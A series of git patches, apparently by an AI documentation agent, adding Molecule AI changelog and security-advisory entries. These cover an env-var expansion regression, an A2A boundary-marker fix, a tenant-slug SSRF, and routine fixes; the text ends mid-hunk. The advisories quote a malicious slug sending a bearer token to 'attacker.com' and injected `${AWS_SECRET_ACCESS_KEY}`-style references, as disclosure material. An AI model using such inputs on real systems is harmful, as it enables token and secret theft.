From 32f15dc591f280d9a52071d0d71e04702c0281b5 Mon Sep 17 00:00:00 2001 From: Molecule AI Documentation Specialist Date: Thu, 14 May 2026 16:18:22 +0000 Subject: [PATCH 01/12] docs(security): add CWE-78 expandWithEnv regression fix to changelog MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Pairs molecule-core#1030 (Critical). Restores POSIX shell-identifier guard in expandWithEnv(org_helpers.go:82) that was inadvertently removed during a regression window. The guard blocks org YAML injection of env-var references like \${HOME} / \${DOCKER_HOST} into workspace_dir and channel config fields. Changes: - security/changelog.md: new "2026-05-14 β€” CWE-78 Regression in expandWithEnv POSIX-identifier Guard" entry (Critical) - changelog.mdx: new "2026-05-14" section with security + bugfix entries Co-Authored-By: Claude Opus 4.7 --- content/docs/changelog.mdx | 19 ++++++++++++++++++ content/docs/security/changelog.md | 31 ++++++++++++++++++++++++++++++ 2 files changed, 50 insertions(+) diff --git a/content/docs/changelog.mdx b/content/docs/changelog.mdx index 0717703..676cf25 100644 --- a/content/docs/changelog.mdx +++ b/content/docs/changelog.mdx @@ -8,6 +8,25 @@ Entries are published daily at 23:50 UTC. --- +## 2026-05-14 + +### πŸ”’ Security + +- **CWE-78 regression in `expandWithEnv` POSIX-identifier guard fixed (Critical)**: the shell-identifier guard in `expandWithEnv` (`org_helpers.go:82`) was inadvertently removed during a regression window between staging and main promotion. This guard prevents org YAML configurations from expanding invalid shell identifiers (e.g. `${HOME}`, `${DOCKER_HOST}`, `${AWS_SECRET_ACCESS_KEY}`) as environment variables β€” blocking secret exfiltration via malicious `workspace_dir` or channel config fields. Restored with regression tests covering `${0}`, `${5}`, `${1VAR}`, `${}`, `$0`, `$5`. Full advisory: [Security Changelog](/docs/security/changelog). (`molecule-core` [#1030](https://git.moleculesai.app/molecule-ai/molecule-core/pulls/1030)) + +### πŸ› Bug fixes + +- **`expandWithEnv` POSIX-identifier guard regression restored**: the same fix as above β€” restores the guard that was removed during a refactor, ensuring invalid shell identifiers in org YAML configs are returned literally instead of being interpreted as environment variable references. (`molecule-core` [#1030](https://git.moleculesai.app/molecule-ai/molecule-core/pulls/1030)) +- **Canvas WCAG 1.4.3 contrast ratio fixed for TIER_CONFIG legend**: the tier legend text in the canvas now meets the 4.5:1 contrast ratio required by WCAG 1.4.3 for normal text. (`molecule-core` [#990](https://git.moleculesai.app/molecule-ai/molecule-core/pulls/990)) +- **Canvas focus-visible rings added to icon and text buttons**: focus-visible rings (`focus-visible:ring-2`) now render on icon buttons and text-only buttons in the canvas, restoring WCAG 2.1 AA compliance for all interactive elements. (`molecule-core` [#988](https://git.moleculesai.app/molecule-ai/molecule-core/pulls/988)) + +### 🧹 Internal + +- **CI infrastructure improvements** (`molecule-core`): `ci-required-drift` workflow updated with job-level `if:` guards to skip `github.ref`-gated jobs in the merge-queue context; `canvas-build` job now has an explicit 20-minute timeout; gitea merge-queue test mocks updated to match current push-gate behavior. (`molecule-core` [#1029](https://git.moleculesai.app/molecule-ai/molecule-core/pulls/1029), [#1006](https://git.moleculesai.app/molecule-ai/molecule-core/pulls/1006), [#1035](https://git.moleculesai.app/molecule-ai/molecule-core/pulls/1035)) +- **Handler test coverage additions** (`molecule-core`): 60+ new SQL-mock test cases covering `InstructionsHandler`, `ScheduleHandler` (28 cases), and the `expandWithEnv` POSIX guard regression suite. (`molecule-core` [#1030](https://git.moleculesai.app/molecule-ai/molecule-core/pulls/1030), [#1005](https://git.moleculesai.app/molecule-ai/molecule-core/pulls/1005), [#999](https://git.moleculesai.app/molecule-ai/molecule-core/pulls/999)) + +--- + ## 2026-05-12 ### πŸ”’ Security diff --git a/content/docs/security/changelog.md b/content/docs/security/changelog.md index e3d6990..7b5f3c3 100644 --- a/content/docs/security/changelog.md +++ b/content/docs/security/changelog.md @@ -9,6 +9,37 @@ This page documents security fixes shipped in the Molecule AI platform. Each ent --- +## 2026-05-14 β€” CWE-78: Regression in `expandWithEnv` POSIX-identifier Guard + +**Severity:** Critical (CWE-78) +**PR:** [#1030](https://git.moleculesai.app/molecule-ai/molecule-core/pull/1030) +**Affected:** `workspace-server/internal/handlers/org_helpers.go` β€” `expandWithEnv` + +### Vulnerability + +`expandWithEnv` expands `${VAR}` and `$VAR` references in org YAML configuration fields (notably `workspace_dir` and channel config) using the current process environment. The POSIX shell-identifier guard was inadvertently removed during a regression window between staging and main promotion, causing digit-prefixed and empty keys to be passed through to `os.Getenv` instead of being returned literally. + +An attacker who can supply org YAML (e.g., via a compromised org template import or a malicious admin account) could inject references such as `${HOME}`, `${DOCKER_HOST}`, `${AWS_SECRET_ACCESS_KEY}`, or `${PATH}` to exfiltrate host secrets into workspace or channel configuration fields. + +### Fix + +Restored the POSIX identifier guard at `org_helpers.go:82`. Keys not starting with `[a-zA-Z_]` (including empty key) are now returned literally as `$key` without consulting `os.Getenv`: + +```go +c := key[0] +if !((c >= 'a' && c <= 'z') || (c >= 'A' && c <= 'Z') || c == '_') { + return "$" + key // not a valid shell identifier β€” return literally +} +``` + +Regression tests cover `${0}`, `${5}`, `${1VAR}`, `${}`, `$0`, `$5`. + +### User-facing summary + +Org YAML configuration fields no longer expand invalid shell identifiers as environment variables. Configurations containing `${0}`, `${}`, or `${1VAR}` patterns are returned as-is. If you observe literal `$` prefixes appearing in workspace directory or channel configuration fields after upgrading, this indicates a previously-masked configuration issue β€” contact support. + +--- + ## 2026-04-20 β€” CWE-22: Path Traversal in `copyFilesToContainer` **Severity:** High (CWE-22) -- 2.52.0 From 65204547645dc01700fb4199b55b84124945e3bf Mon Sep 17 00:00:00 2001 From: Molecule AI Documentation Specialist Date: Thu, 14 May 2026 22:21:11 +0000 Subject: [PATCH 02/12] =?UTF-8?q?docs(changelog):=20add=20OFFSEC-003=20wor?= =?UTF-8?q?kspace-side=20boundary=20escaping=20=E2=80=94=20molecule-core#1?= =?UTF-8?q?073?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Adds the workspace-side OFFSEC-003 hardening entry to the 2026-05-14 changelog section already opened in docs#45. Changes: - changelog.mdx: OFFSEC-003 workspace boundary escaping + closer truncation added to the 2026-05-14 security section alongside CWE-78 entry Note: core#1075 (OFFSEC-010 symlink in provisioner) is SaaS-only provisioner detail β€” no public docs needed. Co-Authored-By: Claude Opus 4.7 --- content/docs/changelog.mdx | 1 + 1 file changed, 1 insertion(+) diff --git a/content/docs/changelog.mdx b/content/docs/changelog.mdx index 676cf25..74de6a7 100644 --- a/content/docs/changelog.mdx +++ b/content/docs/changelog.mdx @@ -13,6 +13,7 @@ Entries are published daily at 23:50 UTC. ### πŸ”’ Security - **CWE-78 regression in `expandWithEnv` POSIX-identifier guard fixed (Critical)**: the shell-identifier guard in `expandWithEnv` (`org_helpers.go:82`) was inadvertently removed during a regression window between staging and main promotion. This guard prevents org YAML configurations from expanding invalid shell identifiers (e.g. `${HOME}`, `${DOCKER_HOST}`, `${AWS_SECRET_ACCESS_KEY}`) as environment variables β€” blocking secret exfiltration via malicious `workspace_dir` or channel config fields. Restored with regression tests covering `${0}`, `${5}`, `${1VAR}`, `${}`, `$0`, `$5`. Full advisory: [Security Changelog](/docs/security/changelog). (`molecule-core` [#1030](https://git.moleculesai.app/molecule-ai/molecule-core/pulls/1030)) +- **OFFSEC-003: workspace-side A2A boundary marker escaping (trust boundary hardening)**: the `tool_delegate_task` workspace tool now wraps delegation output with `_A2A_BOUNDARY_START_ESCAPED` / `_A2A_BOUNDARY_END_ESCAPED` instead of raw markers, preventing raw boundary markers from leaking into output alongside their escaped form. Additionally, responses containing the raw closer `[A2A_RESULT_FROM_PEER]` are now truncated before sanitization β€” so injection of the raw closer cannot be retroactively re-added by the sanitization pass. Together with the platform-side sanitization (shipped 2026-05-11), this closes the full OFFSEC-003 trust-boundary for delegation result delivery. (`molecule-core` [#1073](https://git.moleculesai.app/molecule-ai/molecule-core/pulls/1073)) ### πŸ› Bug fixes -- 2.52.0 From e409a675396a72abd580108c2270f9137ff1e657 Mon Sep 17 00:00:00 2001 From: Molecule AI Documentation Specialist Date: Fri, 15 May 2026 00:01:02 +0000 Subject: [PATCH 03/12] docs(changelog): add openclaw#4 config fix to 2026-05-14 entry Adds the openclaw workspace template models-in-runtime_config bug fix to today's changelog alongside the existing CWE-78 + OFFSEC-003 entries. Co-Authored-By: Claude Opus 4.7 --- content/docs/changelog.mdx | 1 + 1 file changed, 1 insertion(+) diff --git a/content/docs/changelog.mdx b/content/docs/changelog.mdx index 74de6a7..23898f1 100644 --- a/content/docs/changelog.mdx +++ b/content/docs/changelog.mdx @@ -20,6 +20,7 @@ Entries are published daily at 23:50 UTC. - **`expandWithEnv` POSIX-identifier guard regression restored**: the same fix as above β€” restores the guard that was removed during a refactor, ensuring invalid shell identifiers in org YAML configs are returned literally instead of being interpreted as environment variable references. (`molecule-core` [#1030](https://git.moleculesai.app/molecule-ai/molecule-core/pulls/1030)) - **Canvas WCAG 1.4.3 contrast ratio fixed for TIER_CONFIG legend**: the tier legend text in the canvas now meets the 4.5:1 contrast ratio required by WCAG 1.4.3 for normal text. (`molecule-core` [#990](https://git.moleculesai.app/molecule-ai/molecule-core/pulls/990)) - **Canvas focus-visible rings added to icon and text buttons**: focus-visible rings (`focus-visible:ring-2`) now render on icon buttons and text-only buttons in the canvas, restoring WCAG 2.1 AA compliance for all interactive elements. (`molecule-core` [#988](https://git.moleculesai.app/molecule-ai/molecule-core/pulls/988)) +- **OpenClaw template `models` config moved to correct level**: the OpenClaw workspace template's `config.yaml` had `models` at the top level, but the platform template handler reads from `runtime_config.models`. This caused `/templates` to return empty models and providers β†’ a blank "Missing API Keys" dialog with no selectable providers, disabling the Deploy button. Moved all model entries under `runtime_config` and added Groq and OpenRouter as alternative providers alongside OpenAI. (`molecule-ai-workspace-template-openclaw` [#4](https://git.moleculesai.app/molecule-ai/molecule-ai-workspace-template-openclaw/pulls/4)) ### 🧹 Internal -- 2.52.0 From a8ae866ce180d502362386fdc65ae230912ae648 Mon Sep 17 00:00:00 2001 From: Molecule AI Documentation Specialist Date: Fri, 15 May 2026 02:22:16 +0000 Subject: [PATCH 04/12] docs(changelog): add 2026-05-15 placeholder section Day 2026-05-15 begins with no merged PRs (cron fired at 02:15 UTC; entry will be populated at 23:50 UTC when the day is finalised). Co-Authored-By: Claude Opus 4.7 --- content/docs/changelog.mdx | 6 ++++++ 1 file changed, 6 insertions(+) diff --git a/content/docs/changelog.mdx b/content/docs/changelog.mdx index 23898f1..56cf849 100644 --- a/content/docs/changelog.mdx +++ b/content/docs/changelog.mdx @@ -8,6 +8,12 @@ Entries are published daily at 23:50 UTC. --- +## 2026-05-15 + +*No merged PRs yet β€” entry published at 23:50 UTC when the day's changes are finalised.* + +--- + ## 2026-05-14 ### πŸ”’ Security -- 2.52.0 From 65942ab7864a6a0b68bd208627b3e495d3b62c4d Mon Sep 17 00:00:00 2001 From: Molecule AI Documentation Specialist Date: Fri, 15 May 2026 04:30:57 +0000 Subject: [PATCH 05/12] docs(changelog): add OFFSEC-006 tenant-slug SSRF advisory to 2026-05-14 + security changelog Adds molecule-core#933 (OFFSEC-006, CWE-918 SSRF + token exfiltration) to the 2026-05-14 Security section in changelog.mdx. Also adds OFFSEC-006 to the Security Changelog (security/changelog.md) with full vulnerability + fix details, cross-referencing docs#41 (offsec-006-slug-ssrf-advisory.mdx) which will add the full advisory page when it merges. Co-Authored-By: Claude Opus 4.7 --- content/docs/changelog.mdx | 1 + content/docs/security/changelog.md | 26 ++++++++++++++++++++++++++ 2 files changed, 27 insertions(+) diff --git a/content/docs/changelog.mdx b/content/docs/changelog.mdx index 56cf849..cab427e 100644 --- a/content/docs/changelog.mdx +++ b/content/docs/changelog.mdx @@ -19,6 +19,7 @@ Entries are published daily at 23:50 UTC. ### πŸ”’ Security - **CWE-78 regression in `expandWithEnv` POSIX-identifier guard fixed (Critical)**: the shell-identifier guard in `expandWithEnv` (`org_helpers.go:82`) was inadvertently removed during a regression window between staging and main promotion. This guard prevents org YAML configurations from expanding invalid shell identifiers (e.g. `${HOME}`, `${DOCKER_HOST}`, `${AWS_SECRET_ACCESS_KEY}`) as environment variables β€” blocking secret exfiltration via malicious `workspace_dir` or channel config fields. Restored with regression tests covering `${0}`, `${5}`, `${1VAR}`, `${}`, `$0`, `$5`. Full advisory: [Security Changelog](/docs/security/changelog). (`molecule-core` [#1030](https://git.moleculesai.app/molecule-ai/molecule-core/pulls/1030)) +- **OFFSEC-006: tenant-slug SSRF + bearer-token exfiltration in self-hosted promotion script (HIGH)**: `scripts/promote-tenant-image.sh` interpolated tenant slugs directly into URL paths and ECR identifiers without validation. A malicious slug such as `?url=https://attacker.com&token=$CP_TOKEN` could redirect HTTP calls to an attacker-controlled host (SSRF) and cause the platform's bearer token to appear in the attacker's server logs. Two-layer fix applied: `set -f` disables bash glob expansion (preventing metacharacter injection via `*`, `?`, `[`), and `validate_slug()` rejects any slug not matching RFC-1123 (`^[a-z0-9]([a-z0-9-]{0,61}[a-z0-9])?$`) with exit code 64 before any network call. Self-hosted operators must upgrade `molecule-core` to include this fix. Full advisory: [OFFSEC-006 advisory](/docs/security/offsec-006-slug-ssrf-advisory). (`molecule-core` [#933](https://git.moleculesai.app/molecule-ai/molecule-core/pulls/933)) - **OFFSEC-003: workspace-side A2A boundary marker escaping (trust boundary hardening)**: the `tool_delegate_task` workspace tool now wraps delegation output with `_A2A_BOUNDARY_START_ESCAPED` / `_A2A_BOUNDARY_END_ESCAPED` instead of raw markers, preventing raw boundary markers from leaking into output alongside their escaped form. Additionally, responses containing the raw closer `[A2A_RESULT_FROM_PEER]` are now truncated before sanitization β€” so injection of the raw closer cannot be retroactively re-added by the sanitization pass. Together with the platform-side sanitization (shipped 2026-05-11), this closes the full OFFSEC-003 trust-boundary for delegation result delivery. (`molecule-core` [#1073](https://git.moleculesai.app/molecule-ai/molecule-core/pulls/1073)) ### πŸ› Bug fixes diff --git a/content/docs/security/changelog.md b/content/docs/security/changelog.md index 7b5f3c3..38fe2f5 100644 --- a/content/docs/security/changelog.md +++ b/content/docs/security/changelog.md @@ -9,6 +9,32 @@ This page documents security fixes shipped in the Molecule AI platform. Each ent --- +## 2026-05-14 β€” CWE-918 + CWE-20: Tenant-Slug SSRF and Bearer-Token Exfiltration in `promote-tenant-image.sh` + +**Severity:** High (CWE-918 SSRF + CWE-20 Improper Input Validation) +**PR:** [#933](https://git.moleculesai.app/molecule-ai/molecule-core/pull/933) +**Affected:** `scripts/promote-tenant-image.sh` +**SaaS impact:** None β€” platform applies the fix server-side + +### Vulnerability + +`promote-tenant-image.sh` interpolated tenant slugs directly into URL paths and ECR repository identifiers without validation. A malicious slug such as `?url=https://attacker.com&token=$CP_TOKEN` could cause the platform to redirect HTTP calls to an attacker-controlled host (SSRF) and expose the platform's bearer token in the attacker's server access logs via the same URL parameter injection. + +Bash glob metacharacters (`*`, `?`, `[`) in slug values were subject to pathname expansion before being passed to curl, adding a secondary injection vector: a slug like `evil?url=https://attacker.com` would expand to a list of filenames before being interpolated into the URL. + +### Fix + +Two-layer defence applied to `promote-tenant-image.sh`: + +1. **`set -f`** (script top): disables glob expansion, so `*`, `?`, and `[` are treated as literal characters. +2. **`validate_slug()`**: new function using RFC-1123 regex (`^[a-z0-9]([a-z0-9-]{0,61}[a-z0-9])?$`). Invalid slugs are rejected with exit code 64 before any network call is issued. Additionally, `validate_tenants()` is called after argument parsing and exits 64 on any tenant with an invalid slug. + +### User-facing summary + +Self-hosted operators must upgrade to the latest `molecule-core` build to include this fix. Tenant slugs are now validated against RFC-1123 before any network call. Slugs containing `?`, `#`, `&`, `$`, `/`, `\`, or spaces are rejected. If you cannot upgrade immediately, audit all tenant slugs and rename any containing these characters. + +--- + ## 2026-05-14 β€” CWE-78: Regression in `expandWithEnv` POSIX-identifier Guard **Severity:** Critical (CWE-78) -- 2.52.0 From a491773cd7fb13502a7c04f5d81cffd26424559e Mon Sep 17 00:00:00 2001 From: Molecule AI Documentation Specialist Date: Fri, 15 May 2026 04:53:17 +0000 Subject: [PATCH 06/12] docs(changelog): replace 2026-05-15 placeholder with full daily entry Covers all docs PRs merged 2026-05-15: - docs#44: MCP HTTP/SSE transport gap-fill - docs#41: OFFSEC-006 SSRF advisory published - docs#40: self-hosted Docker deployment guide - docs#30: dev-channels flag requirement page - docs#29: remote-workspaces graceful shutdown - docs#32: PLATFORM_URL defaults fix - docs#31: CWE-22 regression advisory added - docs#27: SOP checklist gate - docs#28/37/36/33: changelog structural fixes Co-Authored-By: Claude Opus 4.7 --- content/docs/changelog.mdx | 21 ++++++++++++++++++++- 1 file changed, 20 insertions(+), 1 deletion(-) diff --git a/content/docs/changelog.mdx b/content/docs/changelog.mdx index cab427e..bf9773e 100644 --- a/content/docs/changelog.mdx +++ b/content/docs/changelog.mdx @@ -10,7 +10,26 @@ Entries are published daily at 23:50 UTC. ## 2026-05-15 -*No merged PRs yet β€” entry published at 23:50 UTC when the day's changes are finalised.* +### ✨ New features + +- **Self-hosted workspace Docker deployment guide**: a new [Self-hosted workspace with Docker](/docs/self-hosting) tutorial covers end-to-end deployment of a Molecule AI workspace using Docker β€” including image pulling, environment configuration, volume mounts, and health-check verification. Replaces the fragmentary "coming soon" placeholder that had been in the self-hosting section. (`docs` [#40](https://git.moleculesai.app/molecule-ai/docs/pulls/40)) +- **`dev-channels` flag requirement documented**: a new [dev-channels flag reference page](/docs/runtime-mcp/dev-channels-flag) explains why Claude Code 2.1.x+ requires `--dangerously-load-development-channels server:molecule` (the tagged allowlist form, not the bare `--dangerously-skip-ipc-lockfile` flag) for inline channel push from the molecule MCP wheel. Covers the three-layer failure mode when the bare flag is used and how the tagged form resolves it. (`docs` [#30](https://git.moleculesai.app/molecule-ai/docs/pulls/30)) + +### πŸ”§ Fixes + +- **MCP HTTP/SSE transport gap-fill**: `content/docs/mcp-server.mdx` updated with a Transport modes section documenting stdio (Claude Code / Cursor) vs HTTP/SSE (remote / headless agents) operation, SSE heartbeat behaviour (`data: null` every 30s on idle connections), and a troubleshooting entry for "Port already in use". The environment variables table now includes `MCP_SERVER_PORT` (default 3000) and `MOLECULE_API_KEY`; `.mcp.json` examples now show `MOLECULE_API_KEY` for both self-hosted and SaaS configurations. (`docs` [#44](https://git.moleculesai.app/molecule-ai/docs/pulls/44)) +- **Remote workspaces graceful shutdown**: `run_heartbeat_loop()` and `run_agent_loop()` in the workspace runtime now accept a `threading.Event` (`stop_event` parameter). Setting the event causes the loop to exit cleanly and return `"stopped"` β€” enabling graceful SIGTERM, Kubernetes, and Docker shutdown for remote agents. The quick-start code example in `content/docs/guides/remote-workspaces.md` has been updated with a SIGTERM handler. (`docs` [#29](https://git.moleculesai.app/molecule-ai/docs/pulls/29)) +- **`PLATFORM_URL` default corrected across docs**: `http://platform:8080` (unreachable inside Docker) replaced with `http://host.docker.internal:8080` in `workspace-runtime.md`, `molecule-technical-doc.md`, and `local-development.md`, matching the corrected runtime default. (`docs` [#32](https://git.moleculesai.app/molecule-ai/docs/pulls/32)) + +### πŸ”’ Security + +- **OFFSEC-006 advisory published: tenant-slug SSRF + token exfiltration**: a new [security advisory](/docs/security/offsec-006-slug-ssrf-advisory) documents the HIGH-severity CWE-918 SSRF and bearer-token exfiltration vulnerability in `scripts/promote-tenant-image.sh` (molecule-core [#933](https://git.moleculesai.app/molecule-ai/molecule-core/pulls/933), merged 2026-05-14). Tenant slugs were interpolated into URL paths without validation; a malicious slug like `?url=https://attacker.com&token=$CP_TOKEN` could redirect HTTP calls to an attacker-controlled host and expose the platform bearer token in attacker logs. Fix adds `set -f` to disable glob expansion and `validate_slug()` with RFC-1123 regex before any network call. Self-hosted operators must upgrade. Advisory also added to the [Security Changelog](/docs/security/changelog). (`docs` [#41](https://git.moleculesai.app/molecule-ai/docs/pulls/41)) +- **CWE-22 path traversal regression advisory added**: the [Security Changelog](/docs/security/changelog) has been updated with the CWE-22 path traversal regression in `org_import.go` (molecule-core [#810](https://git.moleculesai.app/molecule-ai/molecule-core/pulls/810), merged 2026-05-13). A regression removed the `resolveInsideRoot` guard from `createWorkspaceTree`; the fix restores it via `loadWorkspaceEnv`. (`docs` [#31](https://git.moleculesai.app/molecule-ai/docs/pulls/31)) + +### 🧹 Internal + +- **SOP checklist merge gate added to docs CI**: the [SOP checklist merge gate](/.gitea/workflows/sop-checklist-gate.yml) is now installed in the docs repo, requiring PR authors to complete a 7-item checklist and receive peer `/sop-ack` comments before merging. (`docs` [#27](https://git.moleculesai.app/molecule-ai/docs/pulls/27)) +- **Changelog structural fixes**: duplicate `## 2026-05-10` section removed and `## 2026-04-23` repositioned to its correct chronological position; daily changelog entries for 2026-05-13 aggregated across all org PRs. (`docs` [#28](https://git.moleculesai.app/molecule-ai/docs/pulls/28), [#37](https://git.moleculesai.app/molecule-ai/docs/pulls/37), [#36](https://git.moleculesai.app/molecule-ai/docs/pulls/36), [#33](https://git.moleculesai.app/molecule-ai/docs/pulls/33)) --- -- 2.52.0 From 757915241469efc603c1599c83ac9c0c19e557cc Mon Sep 17 00:00:00 2001 From: Molecule AI Documentation Specialist Date: Fri, 15 May 2026 05:16:50 +0000 Subject: [PATCH 07/12] =?UTF-8?q?docs(changelog):=20update=20docs#40=20?= =?UTF-8?q?=E2=86=92=20docs#46=20for=20self-hosted=20Docker=20guide=20entr?= =?UTF-8?q?y?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit docs#40 is closed; the tutorial file is now on docs#46's branch. Updated the entry to reference docs#46 and mention the Kubernetes terminationGracePeriodSeconds fix. Co-Authored-By: Claude Opus 4.7 --- content/docs/changelog.mdx | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/content/docs/changelog.mdx b/content/docs/changelog.mdx index bf9773e..f06cc78 100644 --- a/content/docs/changelog.mdx +++ b/content/docs/changelog.mdx @@ -12,7 +12,7 @@ Entries are published daily at 23:50 UTC. ### ✨ New features -- **Self-hosted workspace Docker deployment guide**: a new [Self-hosted workspace with Docker](/docs/self-hosting) tutorial covers end-to-end deployment of a Molecule AI workspace using Docker β€” including image pulling, environment configuration, volume mounts, and health-check verification. Replaces the fragmentary "coming soon" placeholder that had been in the self-hosting section. (`docs` [#40](https://git.moleculesai.app/molecule-ai/docs/pulls/40)) +- **Self-hosted workspace Docker deployment guide**: a new [Self-hosted workspace with Docker](/docs/self-hosting) tutorial covers end-to-end deployment of a Molecule AI workspace using Docker β€” including image pulling, environment configuration, volume mounts, and health-check verification. Includes a corrected Kubernetes YAML example (`terminationGracePeriodSeconds: 120` to match the liveness probe threshold) and a SIGTERM graceful shutdown code example. (`docs` [#46](https://git.moleculesai.app/molecule-ai/docs/pulls/46)) - **`dev-channels` flag requirement documented**: a new [dev-channels flag reference page](/docs/runtime-mcp/dev-channels-flag) explains why Claude Code 2.1.x+ requires `--dangerously-load-development-channels server:molecule` (the tagged allowlist form, not the bare `--dangerously-skip-ipc-lockfile` flag) for inline channel push from the molecule MCP wheel. Covers the three-layer failure mode when the bare flag is used and how the tagged form resolves it. (`docs` [#30](https://git.moleculesai.app/molecule-ai/docs/pulls/30)) ### πŸ”§ Fixes -- 2.52.0 From 9a2b259be4538665d46b7effd4c818dbd97ff639 Mon Sep 17 00:00:00 2001 From: Molecule AI Documentation Specialist Date: Fri, 15 May 2026 08:02:27 +0000 Subject: [PATCH 08/12] docs(changelog): add 2026-05-15 EOD entries + broadcast/talk_to_user API docs MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit ## New feature docs - content/docs/changelog.mdx: add molecule-core#1121 workspace ability flags (broadcast_enabled + talk_to_user_enabled), molecule-core#1143 OpenClaw heartbeat fix, openclaw#5 minimax/moonshot routing fix, molecule-core#1138 ProviderRegistry, openclaw#6 GitHubβ†’Gitea port - content/docs/mcp-server.mdx: add broadcast_message to Communication table; add Callout explaining send_message_to_user/talk_to_user_enabled behaviour - content/docs/api-reference.mdx: add PATCH /workspaces/:id/abilities (AdminAuth) with full body/response documentation πŸ€– Generated with [Claude Code](https://claude.ai/claude-code) --- content/docs/api-reference.mdx | 1 + content/docs/changelog.mdx | 5 +++++ content/docs/mcp-server.mdx | 5 +++++ 3 files changed, 11 insertions(+) diff --git a/content/docs/api-reference.mdx b/content/docs/api-reference.mdx index 5148985..983fd8b 100644 --- a/content/docs/api-reference.mdx +++ b/content/docs/api-reference.mdx @@ -74,6 +74,7 @@ Core workspace CRUD and lifecycle operations. | GET | `/workspaces/:id` | WorkspaceAuth | Get a single workspace by ID. | | PATCH | `/workspaces/:id` | WorkspaceAuth | Update workspace fields. A workspace bearer token is always required β€” unauthenticated calls return 401. Validates field constraints: `name` ≀ 255 chars, `role` ≀ 1,000 chars, `model` and `runtime` ≀ 100 chars each; `name` and `role` must not contain newlines (`\\n`, `\\r`) or YAML-special characters (`{}[]|>*&!`). Oversized or invalid field values return 400. `:id` must be a valid UUID. Financial fields (`budget_limit`) are not accepted here β€” use `PATCH /workspaces/:id/budget` (AdminAuth). | | DELETE | `/workspaces/:id` | AdminAuth | Delete a workspace. Stops the container, revokes all auth tokens, and removes all associated data. | +| PATCH | `/workspaces/:id/abilities` | AdminAuth | Toggle workspace ability flags. Body: `{ "broadcast_enabled": bool, "talk_to_user_enabled": bool }` β€” each field is optional; omitted fields are unchanged. Both flags default to `false`/`true` respectively. `broadcast_enabled=true` enables the `broadcast_message` MCP tool. `talk_to_user_enabled=false` causes `send_message_to_user` and `POST /notify` to return HTTP 403 with a hint to use `delegate_task`; the canvas ChatTab shows a banner with an Enable button. Both flags are persisted to the workspace row. | ### Lifecycle diff --git a/content/docs/changelog.mdx b/content/docs/changelog.mdx index f06cc78..f2fba1c 100644 --- a/content/docs/changelog.mdx +++ b/content/docs/changelog.mdx @@ -14,12 +14,15 @@ Entries are published daily at 23:50 UTC. - **Self-hosted workspace Docker deployment guide**: a new [Self-hosted workspace with Docker](/docs/self-hosting) tutorial covers end-to-end deployment of a Molecule AI workspace using Docker β€” including image pulling, environment configuration, volume mounts, and health-check verification. Includes a corrected Kubernetes YAML example (`terminationGracePeriodSeconds: 120` to match the liveness probe threshold) and a SIGTERM graceful shutdown code example. (`docs` [#46](https://git.moleculesai.app/molecule-ai/docs/pulls/46)) - **`dev-channels` flag requirement documented**: a new [dev-channels flag reference page](/docs/runtime-mcp/dev-channels-flag) explains why Claude Code 2.1.x+ requires `--dangerously-load-development-channels server:molecule` (the tagged allowlist form, not the bare `--dangerously-skip-ipc-lockfile` flag) for inline channel push from the molecule MCP wheel. Covers the three-layer failure mode when the bare flag is used and how the tagged form resolves it. (`docs` [#30](https://git.moleculesai.app/molecule-ai/docs/pulls/30)) +- **Workspace ability flags: broadcast and talk-to-user**: two new workspace-level ability flags β€” `broadcast_enabled` (default `false`) and `talk_to_user_enabled` (default `true`) β€” give org admins fine-grained control over workspace-to-user communication. `broadcast_enabled` enables the `broadcast_message` MCP tool, which fans out an org-wide notification to all non-removed peer workspaces. `talk_to_user_enabled=false` causes `send_message_to_user` and `POST /notify` to return HTTP 403 with a hint to use `delegate_task` instead; the canvas ChatTab shows a banner with an Enable button. Both flags are toggled independently via `PATCH /workspaces/:id/abilities` (AdminAuth). The `AgentMessageWriter` is the single gate for the talk-to-user check across both MCP and HTTP paths. (`molecule-core` [#1121](https://git.moleculesai.app/molecule-ai/molecule-core/pulls/1121)) ### πŸ”§ Fixes - **MCP HTTP/SSE transport gap-fill**: `content/docs/mcp-server.mdx` updated with a Transport modes section documenting stdio (Claude Code / Cursor) vs HTTP/SSE (remote / headless agents) operation, SSE heartbeat behaviour (`data: null` every 30s on idle connections), and a troubleshooting entry for "Port already in use". The environment variables table now includes `MCP_SERVER_PORT` (default 3000) and `MOLECULE_API_KEY`; `.mcp.json` examples now show `MOLECULE_API_KEY` for both self-hosted and SaaS configurations. (`docs` [#44](https://git.moleculesai.app/molecule-ai/docs/pulls/44)) - **Remote workspaces graceful shutdown**: `run_heartbeat_loop()` and `run_agent_loop()` in the workspace runtime now accept a `threading.Event` (`stop_event` parameter). Setting the event causes the loop to exit cleanly and return `"stopped"` β€” enabling graceful SIGTERM, Kubernetes, and Docker shutdown for remote agents. The quick-start code example in `content/docs/guides/remote-workspaces.md` has been updated with a SIGTERM handler. (`docs` [#29](https://git.moleculesai.app/molecule-ai/docs/pulls/29)) - **`PLATFORM_URL` default corrected across docs**: `http://platform:8080` (unreachable inside Docker) replaced with `http://host.docker.internal:8080` in `workspace-runtime.md`, `molecule-technical-doc.md`, and `local-development.md`, matching the corrected runtime default. (`docs` [#32](https://git.moleculesai.app/molecule-ai/docs/pulls/32)) +- **OpenClaw external workspace heartbeat fix**: the OpenClaw workspace template's `pip install` command now pins `molecule-ai-workspace-runtime>=0.1.999`, ensuring workspaces automatically receive the `molecule-mcp` console script which POSTs `/registry/register` on startup and runs a 20-second heartbeat thread. Older versions shipped only `a2a_mcp_server` which does not heartbeat, causing workspaces to show OFFLINE within 60 seconds of startup. (`molecule-core` [#1143](https://git.moleculesai.app/molecule-ai/molecule-core/pulls/1143)) +- **Minimax/Moonshot model routing fixed in OpenClaw**: the OpenClaw adapter was routing all non-qianfan model prefixes (including minimax and moonshot/kimi) to `OPENAI_API_KEY` + `api.openai.com`, causing a NOT CONFIGURED error for any workspace with only `MINIMAX_API_KEY` or `KIMI_API_KEY` set. Replaced the if/else cascade with explicit per-prefix lookup tables covering all six providers (openai, groq, openrouter, qianfan, minimax, moonshot). (`molecule-ai-workspace-template-openclaw` [#5](https://git.moleculesai.app/molecule-ai/molecule-ai-workspace-template-openclaw/pulls/5)) ### πŸ”’ Security @@ -30,6 +33,8 @@ Entries 